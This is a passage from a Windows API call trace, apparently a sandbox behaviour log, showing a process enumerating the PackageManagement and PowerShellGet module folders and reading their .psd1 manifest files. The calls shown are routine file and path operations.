ftLastAccessTime.dwLowDateTime=0x24e3d340, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24e3d340, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0087.725] FindNextFileW (in: hFindFile=0x34d3c0, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0087.725] FindClose (in: hFindFile=0x34d3c0 | out: hFindFile=0x34d3c0) returned 1 [0087.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb7c) returned 1 [0087.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeddc) returned 1 [0087.726] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.psd1")) returned 0xffffffff [0087.726] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.psm1")) returned 0xffffffff [0087.727] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.cdxml")) returned 0xffffffff [0087.727] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.xaml")) returned 0xffffffff [0087.727] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.ni.dll" (normalized: "c:\\program 
files\\windowspowershell\\modules\\modules.ni.dll")) returned 0xffffffff [0087.727] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.dll")) returned 0xffffffff [0087.727] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0087.727] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0087.727] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0087.728] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24e89600, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24e89600, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24e89600, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0087.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0087.728] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0087.728] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x39, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 
0x38 [0087.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0087.728] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24e3d340, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24e3d340, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0087.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0087.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebee0c) returned 1 [0087.728] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0087.728] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0087.728] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*", lpFindFileData=0x4ebebbc | out: lpFindFileData=0x4ebebbc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24e89600, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24e89600, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24e89600, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x34d3c0 [0087.729] FindNextFileW (in: hFindFile=0x34d3c0, lpFindFileData=0x4ebebc4 | out: 
lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24e89600, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24e89600, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24e89600, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.729] FindNextFileW (in: hFindFile=0x34d3c0, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24e89600, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24efba20, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24efba20, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0087.730] FindNextFileW (in: hFindFile=0x34d3c0, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0087.730] FindClose (in: hFindFile=0x34d3c0 | out: hFindFile=0x34d3c0) returned 1 [0087.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb7c) returned 1 [0087.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeddc) returned 1 [0087.730] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0087.730] GetFullPathNameW (in: lpFileName="C:\\Program 
Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0087.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb60) returned 1 [0087.730] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee24 | out: lpFileInformation=0x4ebee24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24ed58c0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x1c7f8280, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x1c7f8280, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x8f9)) returned 1 [0087.731] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb5c) returned 1 [0087.874] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0087.874] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0087.874] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0087.874] GetFullPathNameW (in: 
lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0087.875] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb84) returned 1 [0087.875] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x6b865d0 | out: lpFileInformation=0x6b865d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24ed58c0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x1c7f8280, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x1c7f8280, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x8f9)) returned 1 [0087.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb80) returned 1 [0087.880] GetEnvironmentVariableW (in: lpName="PSModuleAnalysisCachePath", lpBuffer=0x4ebde48, nSize=0xbc | out: lpBuffer="") returned 0x0 [0087.881] CoTaskMemAlloc (cb=0x20c) returned 0x3173f0 [0087.881] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x3173f0 | out: pszPath="C:\\Users\\5AlR3U30D3\\AppData\\Local") returned 0x0 [0087.881] CoTaskMemFree (pv=0x3173f0) [0087.881] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x22 [0087.881] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local", nBufferLength=0x22, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local", lpFilePart=0x0) returned 0x21 [0087.881] GetFileAttributesW 
(lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache")) returned 0xffffffff [0087.903] GetFileAttributesW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache")) returned 0xffffffff [0087.934] GetFileAttributesW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache")) returned 0xffffffff [0087.972] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0087.972] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0087.972] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebecec) returned 1 [0087.972] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x468 [0087.973] GetFileType (hFile=0x468) returned 0x1 [0087.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebece8) returned 1 [0087.973] GetFileType 
(hFile=0x468) returned 0x1 [0087.973] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebed28*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebed28*=0) returned 0x0 [0087.973] ReadFile (in: hFile=0x468, lpBuffer=0x6b88874, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebed54, lpOverlapped=0x0 | out: lpBuffer=0x6b88874*, lpNumberOfBytesRead=0x4ebed54*=0x8f9, lpOverlapped=0x0) returned 1 [0087.975] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebed28*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebed28*=0) returned 0x8f9 [0087.975] ReadFile (in: hFile=0x468, lpBuffer=0x6b87d0d, nNumberOfBytesToRead=0x307, lpNumberOfBytesRead=0x4ebed54, lpOverlapped=0x0 | out: lpBuffer=0x6b87d0d*, lpNumberOfBytesRead=0x4ebed54*=0x0, lpOverlapped=0x0) returned 1 [0087.975] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebed28*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebed28*=0) returned 0x8f9 [0087.975] ReadFile (in: hFile=0x468, lpBuffer=0x6b88874, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebed54, lpOverlapped=0x0 | out: lpBuffer=0x6b88874*, lpNumberOfBytesRead=0x4ebed54*=0x0, lpOverlapped=0x0) returned 1 [0087.976] CloseHandle (hObject=0x468) returned 1 [0087.999] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0087.999] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0087.999] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program 
files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0087.999] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0088.000] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.ni.dll")) returned 0xffffffff [0088.001] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0088.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebee0c) returned 1 [0088.001] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0088.001] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x39, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0088.001] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*", lpFindFileData=0x4ebebbc | out: lpFindFileData=0x4ebebbc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24e3d340, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24e3d340, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 
0x34d3c0 [0088.001] FindNextFileW (in: hFindFile=0x34d3c0, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24e3d340, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24e3d340, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.001] FindNextFileW (in: hFindFile=0x34d3c0, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24e634a0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24e634a0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0088.001] FindNextFileW (in: hFindFile=0x34d3c0, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0088.001] FindClose (in: hFindFile=0x34d3c0 | out: hFindFile=0x34d3c0) returned 1 [0088.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb7c) returned 1 [0088.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeddc) returned 1 [0088.002] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0088.002] GetFullPathNameW 
(in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0088.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb60) returned 1 [0088.002] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee24 | out: lpFileInformation=0x4ebee24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x1c7d2120, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x1c7d2120, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0088.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb5c) returned 1 [0088.002] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0088.002] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0088.002] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0088.002] GetFullPathNameW (in: lpFileName="C:\\Program 
Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0088.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb84) returned 1 [0088.003] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x6b96a10 | out: lpFileInformation=0x6b96a10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x1c7d2120, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x1c7d2120, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0088.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb80) returned 1 [0088.003] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0088.003] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0088.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebecec) returned 1 [0088.003] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), dwDesiredAccess=0x80000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4c4 [0088.003] GetFileType (hFile=0x4c4) returned 0x1 [0088.004] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebece8) returned 1 [0088.004] GetFileType (hFile=0x4c4) returned 0x1 [0088.004] SetFilePointer (in: hFile=0x4c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebed28*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebed28*=0) returned 0x0 [0088.004] ReadFile (in: hFile=0x4c4, lpBuffer=0x6b977e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebed54, lpOverlapped=0x0 | out: lpBuffer=0x6b977e8*, lpNumberOfBytesRead=0x4ebed54*=0x1000, lpOverlapped=0x0) returned 1 [0088.007] SetFilePointer (in: hFile=0x4c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebed28*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebed28*=0) returned 0x1000 [0088.007] ReadFile (in: hFile=0x4c4, lpBuffer=0x6b977e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebed54, lpOverlapped=0x0 | out: lpBuffer=0x6b977e8*, lpNumberOfBytesRead=0x4ebed54*=0xde, lpOverlapped=0x0) returned 1 [0088.007] SetFilePointer (in: hFile=0x4c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebed28*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebed28*=0) returned 0x10de [0088.007] ReadFile (in: hFile=0x4c4, lpBuffer=0x6b977e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebed54, lpOverlapped=0x0 | out: lpBuffer=0x6b977e8*, lpNumberOfBytesRead=0x4ebed54*=0x0, lpOverlapped=0x0) returned 1 [0088.007] CloseHandle (hObject=0x4c4) returned 1 [0088.011] CoCreateGuid (in: pguid=0x4ebed94 | out: pguid=0x4ebed94*(Data1=0xe9f6eb77, Data2=0x23be, Data3=0x4464, 